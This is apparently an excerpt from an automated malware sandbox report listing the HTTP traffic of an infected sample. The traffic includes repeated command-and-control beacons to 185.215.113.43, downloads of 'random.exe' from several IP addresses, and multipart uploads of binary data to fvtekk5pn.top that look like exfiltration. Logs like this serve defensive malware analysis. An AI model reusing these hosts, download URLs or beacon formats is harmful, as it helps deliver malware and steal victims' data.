Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 34 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008485001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 34 38 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008486001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFCBAKKFBFIECAEBAEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 39 43 38 39 44 34 37 32 43 42 31 36 38 31 38 39 35 35 38 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 2d 2d 0d 0a Data Ascii: ------CGCFCBAKKFBFIECAEBAEContent-Disposition: form-data; name="hwid"D59C89D472CB1681895587------CGCFCBAKKFBFIECAEBAEContent-Disposition: form-data; name="build"mars------CGCFCBAKKFBFIECAEBAE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 34 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008487001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 458Content-Type: multipart/form-data; boundary=------------------------69KraUnzj5RkJ5IAUqNKeGData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 39 4b 72 61 55 6e 7a 6a 35 52 6b 4a 35 49 41 55 71 4e 4b 65 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 46 69 70 6f 6c 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 93 45 3a 99 fd 70 7e 68 92 59 ee ce 63 05 66 8c 42 6c 99 27 13 9b 42 33 32 e3 80 95 c4 b2 a6 36 99 fa 37 70 51 65 e9 4f 18 cb d1 21 08 8c d3 f4 1c b2 98 af 74 05 6a 2b 57 46 7b 5b 5a d7 d7 d6 1b 85 38 58 fc 60 77 eb bf b7 66 07 42 37 3f 2c 80 a3 58 99 0c fe b0 5b 85 b2 7a 20 fb 26 2f ef 06 0a 54 a3 c0 f7 a1 74 83 2a 1c 1c e3 65 d9 c7 f5 81 18 64 89 7c f7 fb 4c 0f 67 fa 00 41 57 ec 5a 78 45 5d 7d d0 4c f7 2d af cb 04 d7 d8 89 2b 0f 2c e9 43 c6 c6 f1 fa a5 d5 1e a1 16 d2 cb aa f7 d4 c3 41 a4 7f 2b 16 db 1d 48 1b 06 11 2b 08 c7 ea d8 9d 4e ae c7 c0 f8 f6 33 c5 3f 9d 02 86 58 10 32 69 4f 03 d0 b0 75 91 f2 0e b0 8e 9a 69 37 b7 3e 12 c4 ae 90 24 94 25 e0 97 2e 12 29 6e fd b3 68 13 c1 3c ae d6 e4 2d b8 24 0c 42 e6 e5 4c 1e cf be 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 39 4b 72 61 55 6e 7a 6a 35 52 6b 4a 35 49 41 55 71 4e 4b 65 47 2d 2d 0d 0a Data Ascii: --------------------------69KraUnzj5RkJ5IAUqNKeGContent-Disposition: form-data; name="file"; filename="Fipolu.bin"Content-Type: application/octet-streamE:p~hYcfBl'B3267pQeO!tj+WF{[Z8X`wfB7?,X[z &/Tt*ed|LgAWZxE]}L-+,CA+H+N3?X2iOui7>$%.)nh<-$BL--------------------------69KraUnzj5RkJ5IAUqNKeG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 58858Content-Type: multipart/form-data; boundary=------------------------6VaOCLJCbl9MoCx2f5pEwpData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 56 61 4f 43 4c 4a 43 62 6c 39 4d 6f 43 78 32 66 35 70 45 77 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 61 78 6f 6d 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 56 59 21 d1 f0 a4 a6 55 5d 05 e1 0d c2 02 c1 ba fd c1 62 06 57 6b 48 55 14 ec d0 2a 0a 22 de a8 74 ca 9c 06 1a 7d 5e 87 06 09 f1 16 86 01 0c b5 d3 38 ba 39 0a d2 72 44 95 cb 2b 0e e1 0b 2d 4d e2 4b 13 78 c1 c3 30 a7 e9 0c 15 62 df 4c c0 a0 91 92 c3 18 05 f4 af e8 e6 78 65 d0 c3 8d cd 4f ef 96 a5 ce 27 a4 6d 6d 15 1d ab 82 12 6c 09 a0 3b e1 35 0d 75 bc 7d f0 cd cd 6f 4a f1 05 75 97 8e 56 e0 15 80 20 a4 63 b4 bd d4 66 d4 34 9c c6 04 a0 aa 1b f1 7e 6b f1 4d 47 fc 97 7a 86 22 a3 fa 0c ff 1a 92 5a 2f a2 db d0 a1 89 45 f1 94 e9 b1 72 fb ba fa 00 d4 ff 6a 8c e6 ac 61 bf 4b 1f 0f b5 87 20 14 6d 04 74 30 d2 2f f9 1a 26 b9 67 ec f8 32 e1 96 97 47 33 cb 5a 66 3b 50 68 b7 db 93 56 77 f9 a3 cc 3d db 4b 34 6b 2b 07 e8 30 75 ed 94 05 cc 5e 3f fc 3f 31 44 08 87 f9 5a 09 f5 79 f3 be d8 2e 11 07 d0 a0 a2 17 76 83 09 52 f3 28 3e 29 ec 1b 7a 9a 4e d3 aa 0d 04 fb 90 d2 8c de a8 ca 54 ee 3d 71 58 3e 8b 92 7a a4 41 58 a7 aa 6c a5 53 e2 34 44 99 0e 57 17 9f 18 55 5d 70 19 e6 f1 ab 7f 00 fe 22 d7 de 03 34 ea 8d 5a dd 6f cf 35 31 b5 50 d1 6e c6 81 3a 42 0a 7c 1f f1 f5 89 55 e9 57 bf eb 4f 46 88 b4 b5 1b 5d cc 59 4d 35 a7 be 2b 9d 9d 1c ff db 4a bd 7e 63 04 83 29 f7 59 ae 84 a8 f6 5e 54 4a 31 88 e8 a3 9d 88 00 c7 6d 85 fc cd 4f 00 71 03 a0 e0 74 1e 61 fc f4 ce 45 da a1 d7 b5 07 d2 a2 8c d5 95 69 49 c7 67 aa 82 0f f7 67 fe 2f 68 df 5a ae 96 c8 2d 0c 46 0d 93 1a 84 58 a6 8d 4c 53 aa e2 d3 be ba d7 14 ad 14 66 9c be b6 fc 1d c5 63 bc 50 f3 ae 49 35 49 3f 05 28 91 f6 40 e5 f5 03 e6 4e ab 00 28 75 69 4b 07 a2 0e 7b 72 73 d3 0b 4d fb 77 ed 48 b3 f4 45 92 4c 60 1f 17 01 eb 13 1d bc 81 d9 50 5c 69 51 73 c8 0c 29 50 17 bf c6 e4 6b cb 72 d2 ff 3b 09 83 fc 7c 18 9b a0 db c2 69 7b ca 96 71 5f 62 4c 28 6f fc 8b 1a 1c 06 0d 4c dc bf f0 10 a6 e3 eb b5 54 fc 43 6f 6d 47 c5 c8 9a cb 5e 3c 96 97 e6 45 20 6f c4 10 8d 0a af 70 9a 43 65 12 d9 d1 57 dd 39 b9 7a 53 e9 14 99 f0 74 a4 21 f1 13 80 f8 c6 e8 ce e0 cd b6 13 41 b4 e4 4f 2d eb a7 db 2d b9 44 2a fa 47 1e 6b 55 18 8b e0 b6 c9 5c 3a 3d 32 c1 bf c6 a0 d4 67 54 6c 05 09 14 3c 0a ee b4 be 4f 7e 81 27 68 b9 58 3c 02 a6 65 af 3f 76 26 69 b8 19 49 40 e6 16 21 fe 18 7d 7c f7 ea 91 16 e0 a6 fe 85 27 58 e4 1b 97 96 19 99 14 33 27 8c b3 b1 ea 57 7e 73 23 97 54 ed 85 99 51 5c cf ee 29 a3 a1 4a 2e b9 b1 b2 55 3b f5 a4 fa 30 29 3b a6 1b a7 45 a3 70 eb e9 c1 7f 71 53 cf 9b 4f de 85 c5 3d 66 10 fc
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
